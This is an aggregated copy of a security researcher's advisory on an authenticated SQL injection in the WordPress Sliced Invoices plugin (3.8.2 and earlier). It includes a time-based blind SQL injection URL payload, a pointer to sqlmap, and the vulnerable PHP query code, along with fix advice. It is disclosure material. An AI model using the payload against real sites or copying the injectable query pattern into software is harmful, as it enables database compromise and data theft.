Wordpress Sliced Invoices <= 3.8.2 Authenticated SQL Injection
source link: https://nitesculucian.github.io/2019/10/22/sliced-invoices-3-8-2-authentificated-sql-injection-vulnerability/
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
Wordpress Sliced Invoices <= 3.8.2 Authenticated SQL Injection
Oct 22, 2019 • my_exploits, offensive_security
Wordpress Sliced Invoices plugin with a version lower then 3.8.2 is affected by an Authenticated SQL Injection vulnerability. Note that this vulnerability is highly similar to Wordpress Sliced Invoices <= 3.8.2 Authenticated Reflected XSS due to the use of the same GET parameter.
Intial submission of the vulnerability
# Exploit Title: Wordpress Sliced Invoices <= 3.8.2 Authenticated SQL Injection Vulnerability
# Date: 22-10-2019
# Exploit Author: Lucian Ioan Nitescu
# Contact: https://twitter.com/LucianNitescu
# Webiste: https://nitesculucian.github.io
# Vendor Homepage: https://slicedinvoices.com/
# Software Link: https://wordpress.org/plugins/sliced-invoices/
# Version: 3.8.2
# Tested on: Ubuntu 18.04 / Wordpress 5.3
1. Description:
Wordpress Sliced Invoices plugin with a version lower then 3.8.2 is affected by an Authenticated SQL Injection vulnerability.
2. Proof of Concept:
Authenticated SQL Injection:
- Using an Wordpress user, access <your target> /wp-admin/admin.php?action=duplicate_quote_invoice&post=8%20and%20(select*from(select(sleep(20)))a)--%20
- The response will be returned after 20 seconds proving the successful exploitation of the vulnerability.
- Sqlmap can be used to further exploit the vulnerability.
Detailed analysis of the vulnerability
Under wp-content/plugins/sliced-invoices/admin/class-sliced-admin.php at line number 2202 we can observe the use of non parameterized queries using $wpdb->get_results() with user-supplied data:
$post_meta_infos = ("SELECT meta_key, meta_value FROM $wpdb->postmeta WHERE post_id=$post_id");
Where the $post_id variable is assigned on line 2154 as:
/*
* get the original post id
*/
$post_id = (isset($_GET['post']) ? $_GET['post'] : $_POST['post']);
This vulnerability could be easily exploited by accessing example.com/wp-admin/admin.php?action=duplicate_quote_invoice&post=8%20and%20(select*from(select(sleep(20)))a)--%20 where example.com is your target. To retrieve more data you can use the sqlmap tool over the affected target URL.
How to fix
Update to the latest available version of the Sliced Invoices plugin.
Public appearances
Other references
Comments
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK